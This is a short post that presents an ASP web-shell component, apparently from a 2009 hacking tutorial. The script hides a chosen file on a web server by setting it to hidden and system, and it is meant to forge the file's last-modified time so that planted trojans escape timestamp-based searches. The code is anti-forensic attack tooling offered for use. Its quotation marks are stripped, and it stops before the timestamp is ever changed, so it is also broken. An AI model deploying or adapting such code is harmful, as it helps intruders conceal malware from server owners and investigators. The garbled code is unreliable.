Aspshell hides and modifies the last modification time of a file. Therefore, when searching for Trojans in the future, you cannot simply judge based on the time. Copy the code code as follows:
'Hide and modify the last modification time of the file aspshell
'Principle: You can modify the attributes of the file through FSO, such as setting it to read-only, hidden, system, etc.; the attributes attribute in FSO modifies the file attributes, 1 is read-only, 2 is hidden, and 4 is system file
'You can reset the last modification time for the file through shell.application
'2009/02/24 write by skyfire
response.write <form method=post>
response.write path: <input name=path value='&server.mappath(/)&' size='30'>(must end with /)<br />
response.write file name: <input name=filename value='test.txt' size='30'><br />
response.write modification time: <input name=time value='12/30/2099 12:30:30' size='30'><br />
response.write <input type=submit value=Modify and hide the file>
response.write </form>
'Get submitted parameters
set path=request.Form(path)
set fileName=request.Form(filename)
set newTime=request.Form(time)
if( (len(path)>0)and(len(fileName)>0)and(len(newTime)>0) )then
'Set file attributes through fso
Set fso=Server.CreateObject(Scripting.FileSystemObject)
Set file=fso.getFile(path&fileName)
file.attributes=2+4 'Set file attributes to hidden + system
'Modify the last modification time of the file through shell.Application
Set shell=Server.CreateObject(Shell.Application)
Set app_path=shell.NameSpace(server.mappath(.))
Set app_file=app_path.ParseName(fileName)
end if